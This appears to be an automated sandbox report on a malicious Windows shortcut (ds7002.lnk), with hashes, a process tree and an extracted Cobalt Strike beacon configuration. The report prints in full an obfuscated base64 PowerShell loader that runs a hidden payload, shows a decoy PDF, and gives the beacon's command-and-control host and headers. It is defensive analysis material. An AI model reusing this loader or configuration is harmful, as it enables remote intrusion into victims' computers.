Analysis
-
max time kernel
80s -
max time network
140s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-12-2020 20:45
Static task
static1
Behavioral task
behavioral1
Sample
ds7002.lnk
Resource
win7v20201028
Behavioral task
behavioral2
Sample
ds7002.lnk
Resource
win10v20201028
General
-
Target
ds7002.lnk
-
Size
392KB
-
MD5
6ed0020b0851fb71d5b0076f4ee95f3c
-
SHA1
e431261c63f94a174a1308defccc674dabbe3609
-
SHA256
2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
-
SHA512
2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3
Malware Config
Extracted
cobaltstrike
http://pandorasong.com:443/access/
-
access_type
512
-
beacon_type
2048
-
create_remote_thread
0
-
day
0
-
dns_idle
0
-
dns_sleep
0
-
host
pandorasong.com,/access/
-
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_method1
GET
-
http_method2
POST
- injection_process
-
jitter
4352
-
maxdns
255
-
month
0
-
pipe_name
\\%s\pipe\msagent_%x
-
polling_time
300000
-
port_number
443
- proxy_password
- proxy_server
- proxy_username
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
7.382016e+08
-
unknown2
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown3
0
-
unknown4
0
-
unknown5
2.350256387e+09
-
uri
/radio/xmlrpc/v45
-
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
-
year
0
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 11 3280 rundll32.exe -
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 3280 rundll32.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
AcroRd32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe -
Processes:
AcroRd32.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION AcroRd32.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
powershell.exeAcroRd32.exepid process 3712 powershell.exe 3712 powershell.exe 3712 powershell.exe 3712 powershell.exe 3712 powershell.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3712 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
AcroRd32.exepid process 3224 AcroRd32.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
AcroRd32.exepid process 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe 3224 AcroRd32.exe -
Suspicious use of WriteProcessMemory 268 IoCs
Processes:
cmd.exepowershell.execsc.execsc.exeAcroRd32.exeRdrCEF.exedescription pid process target process PID 1192 wrote to memory of 3712 1192 cmd.exe powershell.exe PID 1192 wrote to memory of 3712 1192 cmd.exe powershell.exe PID 3712 wrote to memory of 864 3712 powershell.exe csc.exe PID 3712 wrote to memory of 864 3712 powershell.exe csc.exe PID 864 wrote to memory of 504 864 csc.exe cvtres.exe PID 864 wrote to memory of 504 864 csc.exe cvtres.exe PID 3712 wrote to memory of 2912 3712 powershell.exe csc.exe PID 3712 wrote to memory of 2912 3712 powershell.exe csc.exe PID 2912 wrote to memory of 1452 2912 csc.exe cvtres.exe PID 2912 wrote to memory of 1452 2912 csc.exe cvtres.exe PID 3712 wrote to memory of 3224 3712 powershell.exe AcroRd32.exe PID 3712 wrote to memory of 3224 3712 powershell.exe AcroRd32.exe PID 3712 wrote to memory of 3224 3712 powershell.exe AcroRd32.exe PID 3712 wrote to memory of 3280 3712 powershell.exe rundll32.exe PID 3712 wrote to memory of 3280 3712 powershell.exe rundll32.exe PID 3224 wrote to memory of 864 3224 AcroRd32.exe RdrCEF.exe PID 3224 wrote to memory of 864 3224 AcroRd32.exe RdrCEF.exe PID 3224 wrote to memory of 864 3224 AcroRd32.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 2820 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 720 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 720 864 RdrCEF.exe RdrCEF.exe PID 864 wrote to memory of 720 864 RdrCEF.exe RdrCEF.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6BEE.tmp" "c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\CSC5A2DD784BD9D45A98611C5537A8A7859.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6DA4.tmp" "c:\Users\Admin\AppData\Local\Temp\zop2j04m\CSC1CF7842663148D6AD4940A97A63AE11.TMP"4⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"3⤵
- Checks processor information in registry
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=165140434⤵
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=47DAFD1037BFF6814912688784990307 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=47DAFD1037BFF6814912688784990307 --renderer-client-id=2 --mojo-platform-channel-handle=1632 --allow-no-sandbox-job /prefetch:15⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=62CC0C764F90EE5DD0B5128877C4F9B0 --mojo-platform-channel-handle=1640 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=FA72FAA5A5B5CBE943BCE6F0E789EA20 --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=1 --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=FA72FAA5A5B5CBE943BCE6F0E789EA20 --renderer-client-id=4 --mojo-platform-channel-handle=2088 --allow-no-sandbox-job /prefetch:15⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=7E5C290B08D1BA219AE472F5319370FD --mojo-platform-channel-handle=2484 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=CF73B682716656EE8F17D52C0930EFC5 --mojo-platform-channel-handle=2080 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=DF60E2F47A1AAA115DE27723D1655990 --mojo-platform-channel-handle=2564 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:25⤵
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall3⤵
- Blocklisted process makes network request
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.dllMD5
3a216209910162c6c313f5e39c72ab72
SHA113a813d2d658ba8ead3ace67197bc7b396724cd8
SHA25663ec074483787e76ccf864f8e9606ba54050287906d77301c84a28cd9270fc7c
SHA512c6af206d2807230e9de74f5b69574dd1f77d44e604f8d96f007ebe6b079e077ecc8f57fa8046d240e16ba2b29cd55e397aa3beb5fad3d5b6b476183e413d1b42
-
C:\Users\Admin\AppData\Local\Temp\RES6BEE.tmpMD5
8ea2811a92592f13205304d3f47136e0
SHA12e5aa2ef235f99848e29f310955844c55f1f7ae4
SHA256ce581893d475bbad2aed1cc7f7fa4431e94192f7540f2f1f89b57c57d43469e7
SHA512f2c00025b083311a7d8e3b13be0b0cfbbe801cd78e2e1ac924bacb11b93070422c77976902f47fa30d8242cccc6a765917ed81161c0997e3bdb1b8bafc11f088
-
C:\Users\Admin\AppData\Local\Temp\RES6DA4.tmpMD5
c604c113370c146557a6b96a525f8f71
SHA1fded3d2e1dc4301a97ee816166d55e64d139076d
SHA25628536c853cf14a0029abc584d4159e66e0e499efd64a3b45eb0c6816b8be41a2
SHA512b188f38531d19fa01506590b7043409b2efd003fabad242ead3821bfe1dc07931ee7fc663c7ae2414db48cb6f8e541e62f4d2c4b0344c99ae36d6ecfb0d66906
-
C:\Users\Admin\AppData\Local\Temp\ds7002.PDFMD5
313f4808aa2a2073005d219bc68971cd
SHA1053fb60530e884851eb8b6aebbec4570ec788d4a
SHA256b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1
SHA5121d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d
-
C:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.dllMD5
d9fac1cadeb75f7a736ab19e574a6770
SHA17736b0605a5ecf3e0820da31871f9677b16cfdb7
SHA256deb20509a1bba2bcd374c95774c2600520abe15ab0b56c706c83631025fe11fe
SHA512c2aa0ab77a9fb02b7d335d56dbac4042817b2e5167ed007dc4528189aa1ca09be5997c7c1fe9ae8be8642fa506ef8dad65b07e1d23bc9423289d8231421a0980
-
C:\Users\Admin\AppData\Local\cyzfc.datMD5
16bbc967a8b6a365871a05c74a4f345b
SHA19858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA51268c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
\??\c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.0.csMD5
cdcb629e6587254315606a6ba3764745
SHA1d5b706ca48b7af8926926e80565148f725c75393
SHA2563c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55
SHA51229f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc
-
\??\c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\4qgwvi1q.cmdlineMD5
54acfa68a7d3b92bc7a9cf902a677226
SHA113c6b985e804ae204c6d12408e626113b7e8ca14
SHA25623aead978c8efa77f68aaec6da07a83455d55bd981503efb6c9c95498321813e
SHA512375c14c22be9ae66a459d33b670076889614f3073897a7c8da1874f0ccc91eff711b69fc2bac14f8602eff3f67a895f4565571e8f288abb3b3fcce14271e67bc
-
\??\c:\Users\Admin\AppData\Local\Temp\4qgwvi1q\CSC5A2DD784BD9D45A98611C5537A8A7859.TMPMD5
ea535899391ce9d8616a881242fae1b4
SHA1877be9c1e74bf2cecc223358e944eb8f96efcb35
SHA256dcc959bdf4587a73912d7b272a481202d39ca268cf05d914fd7995a89d323ce5
SHA512609d1e6a5a2ca7d03e92b806fc176c29abde2f4d3ce7051b1bf63b4ff8b0c0b92bcd66bae415e65b238c1501c8735bb27bc997d32d8c77695ff16ad183f0479a
-
\??\c:\Users\Admin\AppData\Local\Temp\zop2j04m\CSC1CF7842663148D6AD4940A97A63AE11.TMPMD5
7501e65132906f5c5e0e5c0db3db1915
SHA1c70c7c523a54fc2bdf3c0679409f4039c2119c92
SHA2569715ddfc28f01049fbd55c573bf31a8d3ffae0598a1e2147026a017c5374397b
SHA5124b83980c715dbb423ffbefd3f923284cae651412fb9e36f11a6d64619d214dbbb32cb6fec31efa2c784c084baf4cbcd30337f1edf9aed122640be6e75ebee6dc
-
\??\c:\Users\Admin\AppData\Local\Temp\zop2j04m\zop2j04m.0.csMD5
